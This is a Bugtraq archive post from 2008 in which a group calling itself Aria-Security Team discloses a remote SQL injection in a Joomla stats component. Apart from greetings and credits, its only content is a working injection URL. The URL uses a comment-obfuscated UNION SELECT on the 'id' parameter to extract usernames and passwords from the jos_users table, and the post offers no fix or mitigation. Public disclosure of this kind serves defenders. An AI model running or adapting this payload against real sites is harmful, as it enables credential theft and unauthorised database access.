Bugtraq mailing list archives

Joomla com_stat "id" Remote SQL Injection

From: no-reply () Aria-Security Net
Date: 24 Feb 2008 01:19:34 -0000

Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
-------------------------------
Shoutz : The-0utl4w, Sc0rp!on, mormoroth, Kinglet, iM4N, 
Joomla com_stat "id" Remote SQL Injection

index.php?option=com_stats&opt=viewteam&id=-100101110000/**/union/**/select/**/username,password,3,4,5,6,7,8/**/from/**/jos_users/*

(Original Advisory@ http://forum.aria-security.net/showthread.php?p=1465)

AurA
Aria-Security Team
(Credits to Aria-Security Team)

Current thread:

Joomla com_stat "id" Remote SQL Injection no-reply (Feb 25)